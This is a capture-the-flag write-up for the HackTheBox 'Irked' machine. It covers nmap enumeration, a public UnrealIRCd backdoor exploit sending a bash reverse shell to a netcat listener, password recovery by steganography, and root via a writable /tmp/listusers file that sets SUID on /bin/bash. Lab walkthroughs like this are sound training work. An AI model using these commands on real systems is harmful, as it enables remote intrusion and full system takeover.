Irked

#Linux #Enumeration #IRC

Irked is an easy-rated Linux machine from HackTheBox, created by Creator MrAgent. In the current post, my IP is 10.10.14.27, and the target IP is 10.129.124.47.

This machine is straightforward. It follows the basic steps for enumeration and exploitation, with some research included.

Gathering Information

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

nmap -p- --open -T5 -v -n 10.129.124.47

There is a website, and a lot of ports related to IRC (Internet Relay Chat), we need to get details.

Local Terminal

nmap -sCV -p 22,80,111,6697,8067,34716,65534 10.129.124.47

Definitely there is an IRC working, those are a communication protocol in real time that we can exploit.

Local Terminal

whatweb -v http://10.129.124.47

Nothing relevant

• Browser: http://10.129.124.47

Source code of the target website

We have limited information, but that phrase is enough, at this point our best option is to search about Unrealircd Exploit, you will find this at GitHub.

Weaponization and Exploitation

Local Terminal

git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor 
cd UnrealIRCd-3.2.8.1-Backdoor/
batcat exploit.py

There is some stuff to change, add the information of your own machine there (Here: 10.10.14.27 // 443), if you continue the analysis, you will find a lot of payloads from an argument, we will use bash.

List of payloads

How to use exploit.py

Here we need to open a new terminal listening using the port 443.

Local Terminal [B]

nc -nlvp 443

Local Terminal [A]

python3 exploit.py 10.129.124.47 6697 -payload bash

We are using the target port 6697 because the IRC is there. After executing, a message “Exploit sent successfully” will appear, and your second local terminal [B] will be connected to the target, this will be called [IRCD]. Now we will start with some TTY treatment.

Target Terminal [IRCD]

cd /
find \-name user.txt 2>/dev/null

After exploring a little bit, at /home/djmardov/Documents there is a backup hidden file, let’s see with cat and check what we can find.

Backup hidden file

Content of .backup

Here we have two things: a clue about Steganography, maybe the image at the URL, and a password, probably related to the Steganography step. Now download the image from http://10.129.124.47, the angry face, and open a local terminal.

Local Terminal

exitftool irked.jpg

Nothing weird

Local Terminal

strings irked.jpg
steghide extract -sf irked.jpg              # Without password, it fails.
steghide extract -sf irked.jpg              # pass: UPupDOWNdownLRlrBAbaSSss
cat pass.txt

New password!

By using Steghide, we extract a new password “Kab6h+m+bbp2J:HG”, we can try to use it at IRCD to change our user.

Target Terminal [IRCD]

su djmardov                            #Pass: Kab6h+m+bbp2J:HG

It works, now we are Djmardov and we can read the flag at /home/djmardov/Documents/user.txt

Privileges Scalation

Target Terminal [Djmardov]

cd /
find \-perm -4000 2>/dev/null

It looks like a custom command

Target Terminal [Djmardov]

/usr/bin/viewuser

A beta for a command to work with permissions?

Target Terminal [Djmardov]

strings /usr/bin/viewuser

By using Strings, we can see that needs the file /tmp/listusers

But it doesn’t even exists

We don’t lose if we try to create that file and put a command inside it.

Target Terminal [Djmardov]

touch /tmp/listusers
chmod +x /tmp/listusers
nano /tmp/listusers

Content of /tmp/listusers

#!/bin/bash

chmod u+s /bin/bash

Target Terminal [Djmardov]

ls -l /bin/bash

Looks like now we can use it, it works!

Target Terminal [Djmardov]

bash -p

Target Terminal [root]

cat /root/root.txt